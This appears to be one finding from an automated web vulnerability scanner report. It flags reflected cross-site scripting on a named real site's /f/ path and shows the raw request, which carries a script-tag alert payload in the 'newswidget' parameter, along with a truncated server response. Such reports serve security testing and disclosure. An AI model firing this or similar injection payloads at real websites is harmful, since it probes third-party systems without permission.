1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://www.feedblitz.com |
Path: | /f/ |
GET /f/?newswidget=84%0088171"><script>alert(1 Host: www.feedblitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 01 Dec 2010 06:59:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-type: text/html; charset=UTF-8 Set-Cookie: perm=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com Set-Cookie: Token="954d46a4fd007 Set-Cookie: UserID=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com Set-Cookie: Alias=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com Set-Cookie: Channel="1"; path=/; domain=.feedblitz.com Content-Length: 76608 <html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title ...[SNIP]... <A title="Subscribe by email" href="https://www ...[SNIP]... |